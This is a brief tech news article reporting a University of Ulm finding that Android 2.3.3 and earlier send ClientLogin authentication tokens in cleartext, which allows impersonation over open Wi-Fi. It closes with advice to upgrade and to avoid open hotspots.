Security experts in Germany have uncovered yet another vulnerability in the Android operating system that could enable hackers to launch so-called ‘impersonation’ attacks on almost every Android device out there.
Just when you thought Google’s Android security wounds from a string of recent malware attacks were finally starting to heal, researchers at the Institute of Media Informatics at University of Ulm have exposed a new flaw in the fast-growing mobile platform. This time it's in a log-in authentication protocol known as ClientLogin, that could potentially give cybercriminals unfettered access to contacts, calendars and other sensitive data stored in Big G’s servers.
Essentially, when a user submits their correct log-in credentials for the above services, as well as Twitter, Facebook and a number of accounts, an authentication token (authToken) is transmitted in cleartext (as in unencrypted). This stays valid for up to 14 days, leaving the door open for hackers to steal the token and use it to log into said services masquerading as legitimate users.
The researchers stated: “We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis.
“The short answer is: Yes, it is possible, and it is quite easy to do so.”
According to the report, the flaw affects any device running Android 2.3.3 or lower. One of the ways the token can be stolen is when a user logs in over an unsecured wireless network.
As such, it is highly recommended that users upgrade to Android 2.3.4 where available as soon as possible, and also turn off automatic synchronisation in the Android settings menu when connecting with open Wi-Fi networks.
To stay on the side of caution, however, especially if Android 2.3.4 has yet to arrive to your device, you should avoid open hotspots altogether until Google releases a patch to take care of the problem.
Source: University of Ulm via The Register